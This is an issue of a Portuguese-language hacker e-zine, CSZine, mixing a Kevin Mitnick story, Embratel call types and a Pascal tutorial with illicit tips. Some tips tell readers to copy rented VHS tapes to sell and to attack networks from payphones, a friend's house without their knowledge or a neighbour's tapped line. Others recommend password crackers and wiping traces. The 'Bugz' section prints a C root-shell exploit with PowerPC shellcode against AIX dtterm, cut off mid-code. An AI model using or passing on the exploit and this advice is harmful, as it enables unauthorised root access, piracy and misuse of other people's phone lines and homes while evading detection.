zZZZZZZZZZZZZZZZz zZ cCCCCCCCCc sSSSSSSSSs zZ cCCCCCCCCCCCCc sSSSSSSSSSSSSs zZ cCCC CCCCc sSSS SSSSs zZ cCCCc SSSSs zZ II NNn NN EEEEE CCCCC SSSSSSSSSSs zZ II NNNn NN EE CCCCC SSSSSSSSSs zZ II NN NnNN EEEE CCCCC SSSSS zZ II NN NNN EE CCCC CCCCc sSSSS SSSS zZ II NN NN EEEEE CCCCCCCCCCCCCC SSSSSSSSSSSSSS zZ CCCCCCCCCC SSSSSSSSSS zZ zZ zZ zZZZZZZZZZZZZZZZZz PS: Se você não conseguiu lêr direito, aí em cima tah escrito CSZine. UIN da revista : 16623675 Canal da revista : #CSCHANNEL no irc.via-rs.com.br E-Mails da revista : cszine@hotmail.com cszine@xoommail.com Page da revista : http://members.xoom.com/cszine =-=-=-=-=-=-=-=-=-=-=-=-=-=-=Cheat=Struck-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Introdução: Pelo que me parece os mails diminuiram muito ultimamente. Sera que isso quer dizer que não estão mais lendo a zine??? Se a coisa continuar assim periga a acabar de vez com a zine. Eu mal to conseguindo segura todas as pon- tas direito, e descubro que poucos estam lendo. Programadores!!! Gostaria que vcs me mandassem mails com fontes de programas em C para servirem de exemplo quando sair o tutorial(se sair). Tb preciso de alguem que se comprometa a escrever um tutorial de C. Não precisa ser lah essas coisas, apenas uma introdução aos comandos simples que eu com- plemento depois. Outra coisa que eu também precisaria que me escrevessem seria a area de Virus e Crackerz. Eu estava pensando em juntar as duas agora que sairá a nova area de Anarchy. Ah Não preciso de mais escritores de anarchy, pois dois kras jah se comprometeram a me enviar o material. Phreakers também são bem vindos. Mandem projetos de boxes, truques ou informações recolhidas, tipo os procedimentos dos aparelhos telefonicos a cartão. Isso se encontra numa das paginas do manual da embratel. Soh que eu ainda não a consegui. A seção News talvez saia junto com a Vivendo pelo fato de eu não ter recebido mails com dicas ou novidades. Outra coisa: A seção Invasão de privacidade que estava prevista para a edição passada não saiu porque quando eu ví, jah tinha acabado ela. Foi mal ,essa jah é a segunda vez q isso acontece. Tomarei mais cuidado no futuro. -=-=-=-=-=-=-=-=-==--=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Indice: Seção: Materia: Assunto: Autor: Nota: 1. Kevin Mitinck "O chacal da rede" AliBaBa 10,0 2. Phreaking Serviços da Embratel Cheat Struck 9,5 3. Programação Tutorial de pascal p3 Cheat Struck 10,0 4. Vivendo Carpe Diem Cheat Struck 9,5 5. Hacking p/ iniciantes Preparando você Cheat Struck 8,5 6. Bugz Bugz para AIX e WinNT Cheat Struck 10,0 7. Crackerz Lista de hexas Cheat Struck 9,5 8. Invasão de privacidade Entrando em bibliotecas Cheat Struck 10,0 9. Hack, the Art Teste Hacker p2 Cheat Struck 9,5 10. ¡¡¡BoNuS!!! Lista de bibliotecas Cheat Struck 9,5 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$ $$$$$$$ $$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$ $$$$$$ 1. Kevin Mitnick $$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$ $$$$$$$ $$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$ -=-=-=-=-=-=-==-=-=-==-=-=-=-=-=-=-=-=-=-==-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=- A histria do Chacal da rede. (parte 2) Em 1991 ja era o Hacker que havia ocupado a primeira paginaa do New York Times e um de seus reporteres, John Markoff, decidiu escrever um livro, de estilo Cyberpunk, narrando as aventuras de Mitnick. Ao que parece, Mitnick não gostou do livro ja que logo que saiu a venda, a conta na Internet de Markoff foi invadida, mudando seu nivel de acesso, de maneira de que qualquer pessona no mundo conectada a Internet poderia ver seu correio eletronico. Em 1992, após concluir seu programa, Mitnick começou a trabalhar em uma agencia de detetives. Descubriu um meio ilegal do uso da base de dados q foi objeto de uma investigação por parte do FBI que determinou que ele havia violado os terminos da sua liberdade condicional. Alarmaram sua casa mas ha- via desaparecido sem deixar rastro algum. Agora Mitnick se havia convertido em um Hacker fugitivo. O fiscal não estava tão equivocado quando pidiu a restrição do uso do telefone. Tambem em 1992, o Departamento de Veiculos de California ofereceu uma recompensa de 1 milhão de dolares a quem prender Mitnick por ter tratado de obter uma licença de dirigir de maneira fraudulenta, utilizando um código de acesso e enviando seus dados via fax. Depois de converterse em fugitivo mudou de tatica e concluiu que a melhor maneira de não ser rastreado era utilizando telefones celulares. Desta maneira poderia cometer suas façanhas e não estar atado a nenhum lugar fixo. Para ele, necessitava obter programas que lhe permitisem moverse com a mesma facilidade com que o fazia na rede telefonica. Depois de varias tentativas frustradas quanto a quantitade de infor- mação, se encontrou com o computador de Tsutomu Shimomura o qual invadio na novidade de 1994. Shimomura, fisico computista e expert em sistemas de segu- rança de San Diego Supercomputer Center, era mais um Hacker muito bom, mas era dos "meninos bonzinhos", ja que quando achava uma falha de segurança em algum sistema, o reportava as autoridades e não a outros Hackers. Shimomura notou que alguem havia invadido seu computador na sua ausencia, utilizando um metodo de intrusão muito sofisticado e que ele nunca antes havia visto. O intruso lhe havia roubado seu correio eletronico, soft- ware para controle de telefones celulares e varias ferramentas de segurança na Internet. Alí começou a contagem regressiva para Mitnick. Shimomura se propôs como orgulho pessoal pegar o Hacker que havia invadido sua privacidade -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-==-=-=-=-=-=-=- Fim da parte 2 -=-=-=-=-=-=-=-=-=--=-=-=-==-=-=-==-=-=-=-=-=-=-=-=-==-==-=-=-=-=-=-=-=-=-=-= $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$ $$$$$$$ $$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$ $$$$$$ 2. Phreaking $$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$ $$$$$$$ $$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$ -=-=-=-=-=-=-==-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Serviços Nacionais da Embratel: Para prestar o Serviço Telefônico em âmbito nacional, a EMBRATEL utili- za diversas centrais telefônicas digitais, denominadas Centrais de Trânsito, interligadas entre si, através de fibras óticas ou meios de transmissão digi- tais. A seguir, estão destacados os principais tipos de chamadas telefônicas que podem trafegar por essa Rede: ***** CHAMADAS INTERURBANAS MANUAIS ou SEMI-AUTOMÁTICAS ***** são aquelas completadas com o auxílio da telefonista interurbana; ***** CHAMADAS DDD ***** são ligações telefônicas completadas, automaticamente, sem o auxílio de telefonista; ***** CHAMADAS INTERURBANAS A COBRAR - DDC/DIC ***** são chamadas em que o assinante de destino se torna, voluntariamente, o responsável pelo pagamento da ligação telefônica; ***** CHAMADAS LOCAIS A COBRAR ***** idênticas às chamadas anteriormente descritas, porém efetuadas dentro da mesma localidade; ***** CHAMADAS PARA O SERVIÇO 0800 ***** são chamadas para as quais o assinante de destino, previamente, é o responsável pelo pagamento do tráfego a ele destinado. ***** CHAMADAS PARA O SERVIÇO 0900 ***** são chamadas destinadas aos serviços de entretenimento, pesquisas de opinião, sorteios, doações, vendas de produtos e serviços, para as quais o usuário não paga a chamada, cabendo apenas o pagamento do valor determinado pelo provedor do serviço em questão. ***** CHAMADAS PARA SERVIÇOS DE REDE INTELIGENTE ***** são chamadas destinadas, a serviços bancários, de cartões de crédito, vendas, transportes e etc, pagas pelo assinante de destino, que incorporam diversas facilidades técnicas, para o provedor do serviço, tais como número único (o mesmo número é discado de qualquer ponto do território nacional sem o uso do Código DDD), atendimento em pontos diferenciados conforme dias e horários previamente acordados, possibilidade de integração de outros servi- ços. -=-=-=-=-=-=-=-=-=-==-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-==-=-=-=-=- Fonte: www.embratel.net.br - internet 0800 102 102 - Telefone a voz -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$ $$$$$$$ $$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$ $$$$$$ 3. Programação $$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$ $$$$$$$ $$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$ -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Aviso!!! Atenção programadores. Estou precisando de alguem para escrever tuto- riais de C para a zine. Eu ateh faria mas estou trabalhando em outros ramos. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-==- Tutorial de Pascal (parte 3) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-= »»»»»»»»»» Comando IF, Then e Else «««««««««« Sintaxe: If then else ; Se a expresão for verdadeira executa o comando1, se for falsa executa o comando2. Caso ter que executar mais de um comando use: If then Begin ; ; ; ... End Else Begin ; ; ... End; Note que o ;(ponto e virgula) só aparece no ultimo End ou depis dos comandos. »»»»»»»»»» Labels e GOTO «««««««««« Exemplo: label INICIO; Begin INICIO: ClrScr; Write ('Olha qts linhas dessas vão aparecer'); Goto INICIO; End. »»»»»»»»»» Repeat e Until «««««««««« Sintaxe: Repeat ; ; ... Until O programa executará os comandos 1 e 2 até que a expressão do Until seja verdadeira. Caso isso nunca aconteça, o programa ficará preso num loop infinito. »»»»»»»»»» While e Do «««««««««« Sintaxe: While Do Begin ; ; ... End; Funciona como o Repeat porém quando a expressão for verdadeira o pro- grama para de executar os comandos e emquanto for falsa ele continuará execu- tando-os. »»»»»»»»»» Case «««««««««« Sintaxe: Case of : ; : ; Else ; End; Se a varialvel tiver como valor o valor1, o comando1 será executado, se tiver como valor o valor2 será executado o comando2... E se não for nenhum deles executará o comando3. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Fim da parte 3 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$ $$$$$$$ $$$$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$ $$$$$$ 4. Vivendo $$$$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$ $$$$$$$ $$$$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$ -=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-==-=-=-==-=-=-=-=-=-=-==-=-=-=-=-=-==-=-= Abrindo portas mal trancadas Jah tive que passar por isso, uma vez em q eu esqueci a chave de casa e não tinha como entrar. Deixe eu explicar a situação: A porta deve ser daquelas que a maçane- ta só gira pelo lado de dentro, imposibilitando com q a possoa do lado de fora abra a porta, a não ser q tenha uma chave. Faça o seguinte.. Desparafuse a maçaneta e a placa de metal q a contorna. Note que as maçanetas são ligadas por tipo um parafuso de 2 cabecas. Use uma chave de fendas e gire este "parafuso" para o lado o qual a maçaneta é virada para abrir a porta. Pimba! The door is opened! -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Grave seus jogos de videogame É trizinho as vezes gravar akela abertura (tipo a do resident evil 2) do seu joginho de videogame. Ou as vezes até o jogo é trisinho ver como voce humilhou akele seu amigo no tekken. Faça o seguinte.. Ligue a tv ao videogame e ao video ksete assim: __________ | | __________ __________ | | | | | ___ | | TV |========|out in|=======| /===\ | | | |__________| | \___/ | |__________| video |__________| videogame Se precisar de um adaptador, ligue o cabo que sai do video para o videogame no local do adaptador onde é para colocar o cabo da TV. Assim: __________ | | __________ _____ | | | | | | | TV |=========|out in|=======|tv | } adaptador | | |__________| | | |__________| video |_____| || || ____||____ | ___ | | /===\ | | \___/ | |__________| videogame -=-=-=-=-=-=-=-=-==-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Escrevendo na calculadora Pegue a calculadora e digite: 603 - 50738 Não aperte = Apresadinho. Vire a calculadora e leia. Agora tecle = , ainda com a calculadora virada, e veja o resultado. Resumo: "belos seios". Mostre para as garotas. Hevvy fun! -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Pirateando fitas de video Kct. Você pode ganhar uma bela duma grana. Para isso vc precisa de 2 videos. Ligue-os assim: __________ | | __________ __________ | | | | | | | TV |========|out in|========|out in| | | |__________| |__________| |__________| video1 video2 Agora coloque akela fita de video que vc alugou, no video1 e uma outra, onde sera' gravado o filme, no video2. Dê um PLAY no vide1 e um REC no video2. Depois que o filme acabar, de uma olhada na fita gravada. Agora en- trege a fita, na maior cara de pau, para a locadora e fature em cima da q vc gravou. Daki a pouco o TITANIC estará nas locadoras, imagine qtas colegas suas não iriam querer comprar a fita do L. de Caprio. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Sekar os tenis rapidinho. Essa fórmula eu acho q foi a minha velha q inventou. Pegua os seus tenis molhadoes dakela pelada de sabado e coloque-os atras da geladeira. Nakeles feros termicos. Akeles baguiu são responsaveis para deixar a geladeira resfriando de tempo em tempo. Em quanto elas estaum resfriando, akeles tróço ficam quentes. Aí é só chega no outro dia de manhã e bota os tenis quentinhos. Se quizer q sequem rapidinho poe no freezer ou se sua geladeira for dakelas modernas, deixa a porta dela aberta. Vc tb pode experimentar coloca -los no microondas e ligar em 4 ou 5 minutos(talvez), mas depois quero vê tu comê akela pipoquinha q caiu fora do saco. -=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--==-=-=-=-=-=-=-=-=-=-=-=-=-=-= $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$ $$$$$$$ $$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$ $$$$$$ 5. Hacking p/ iniciantes $#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$ $$$$$$$ $$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$ -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Preparando vc para o mundo hacker -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Em primeiro lugar. A pergunta quetod mundo se faz um dia: O que eu tenho que saber para ser um hacker?? Muitas pessoas dizem que apenas conhecendo o protocolo TCP/IP ou o protocolo que a sua rede pessoal usa vc jah sabe o bastante. Não deixa de ser verdade, mas para vc ser reconhecido como um hacker vc precisa saber muito mais. Tenha um dominio total e absoluto de informatica. Se vc comprou um computador a 6 meses e jah acha que é o maior genio, pode parar de sonhar cabeça de melão. Eu recomendo vc fazer um dakeles cursos completos, desde introdução a hardware. Após ter adquirido essa cultura, se especialize em um desses locais: ------- Sistemas operacionais UNIX ------- 90% dos computadores que acessam a internet usam sistemas da familia UNIX, passando por AIX, IRIX, HP/UX. ------- Conhecimentos de programação ------- De preferencia C, é a linguagem mais extendida. tb existem outra linguagens como Assembly e perl q é interesante conhecer. ------- Conhecimentos de redes ------- A melhor forma de hackear é atravez de redes. ------- Conhecimentos de telefonia ------- A melhor forma de se conectar a redes é atravez de um modem e uma linha telefonica. Por isso é bom vc entender. ------- Protocolos ------- Também deve conhecer 100% todos os protocolos da rede que vc hackear. Você também precisa ter bons programas apenas por comodismo. ------- Um dialer ------- Para estabelecer conexões com a rede. No Windows o melhor é o Trumpet e no linux o minicom. ------- Um programa de telnet ------- O melhor ateh agora pra mim é o telnet do linux. ------- Um programa de ftp ------- O ftp do linux serve. O windows tentou imitar mas não tem tantas funções quanto o do linux. ------- Um browser ------- Navegador da web. Netscape e Lynx saum bons. Dispense o Internet Ex- plorer caso esteja de Windows. ------- Um scaneador de portas ------- Existem programas tipo portscan da 7th Sphere para Windows. Para Li- nux a fonte está na minha page. ------- Um crackeador ------- Para senhas de Unix e tb é bom um para Novel. Ótimos são o John e o Jack. Ambos para Linux. Talvez algumas versões para windows/dos. ------- Ferramentas de diagnostico de redes ------- Tipo um sniffer, um medidor de trafico, um capturador de pacotes.. ------- Um programa para acabar com rastros ------- Você pode fazer um script legalzinho que faça isso. Não faça tb coisas ilegais de sua casa. Os melhores lugares para se conectar a rede q vc vai hackear são: ------- Computadores de universidades. ------- Cabines telefonicas. ------- Casa de um 'amigo', mas q este não saiba oq vc esta fazendo. ------- Usando uma extenção de linha de seu visinho. Pra mim, o melhor lugar é os orelhoes, mas pra isso é exencial ter um laptop, ou vc quer montar o computador alí na cabine? Acho q por hoje chega. O conteudo pode tar começando a ficar meio ruim mas é que eu não so muito dessas coisas sabe. Se alguem quizer editar essa seção mail-me. $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$ $$$$$$ $$$$$$$$$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$ $$$$$ 6. Bugz $$$$$$$$$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$ $$$$$$ $$$$$$$$$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$ --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Bug para AIX =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= É um exploit para conseguir a shell do root. Compile-o assim: cc -g aixdtterm.c --------------------------Corte Aki------------------------------------------ /* Para obtener un shell de root, testeado en Aix 4.2 con RS/6000*/ #include #include #include char prog[100]="/usr/dt/bin/dtterm"; char prog2[30]="dtterm"; extern int execv(); char *createvar(char *name,char *value) { char *c; int l; l=strlen(name)+strlen(value)+4; if (! (c=malloc(l))) {perror("error allocating");exit(2);}; strcpy(c,name); strcat(c,"="); strcat(c,value); putenv(c); return c; } /*El programa*/ main(int argc,char **argv,char **env) { /*El codigo*/ unsigned int code[]={ 0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 , 0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c , 0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 , 0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c , 0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 , 0x7c0903a6 , 0x4e800420, 0x0 }; /* El desensamblado 7c0802a6 mfspr r0,LR 9421fbb0 stu SP,-1104(SP) --get stack 90010458 st r0,1112(SP) 3c60f019 cau r3,r0,0xf019 --CTR 60632c48 lis r3,r3,11336 --CTR 90610440 st r3,1088(SP) 3c60d002 cau r3,r0,0xd002 --TOC 60634c0c lis r3,r3,19468 --TOC 90610444 st r3,1092(SP) 3c602f62 cau r3,r0,0x2f62 --'/bin/sh\x01' 6063696e lis r3,r3,26990 90610438 st r3,1080(SP) 3c602f73 cau r3,r0,0x2f73 60636801 lis r3,r3,26625 3863ffff addi r3,r3,-1 9061043c st r3,1084(SP) --terminate with 0 30610438 lis r3,SP,1080 7c842278 xor r4,r4,r4 --argv=NULL 80410440 lwz RTOC,1088(SP) 80010444 lwz r0,1092(SP) --jump 7c0903a6 mtspr CTR,r0 4e800420 bctr --jump */ #define MAXBUF 600 unsigned int buf[MAXBUF]; unsigned int frame[MAXBUF]; unsigned int i,nop,mn; int max; int QUIET=0; int dobuf=0; unsigned int toc; unsigned int eco; unsigned int *pt; char *t; int ch; unsigned int reta; /* direccion de retorno */ int corr=1000; char *args[4]; char *arg1="-ms"; char *newenv[8]; int startwith=0; mn=200; max=300; if (argc>1) corr = atoi(argv[1]); pt=(unsigned *) &execv; toc=*(pt+1); eco=*pt; if ( ((mn+strlen((char*)&code)/4)>max) || (max>MAXBUF) ) { perror("Bad parameters"); exit(1); } #define OO 7 *((unsigned short *)code + OO + 2)=(unsigned short) (toc & 0x0000ffff); *((unsigned short *)code + OO)=(unsigned short) ((toc >> 16) & 0x0000ffff); *((unsigned short *)code + OO + 8 )=(unsigned short) (eco & 0x0000ffff); *((unsigned short *)code + OO + 6 )=(unsigned short) ((eco >> 16) & 0x0000ffff); reta=startwith ? (unsigned) &buf[mn]+corr : (unsigned)&buf[0]+corr; for(nop=0;nop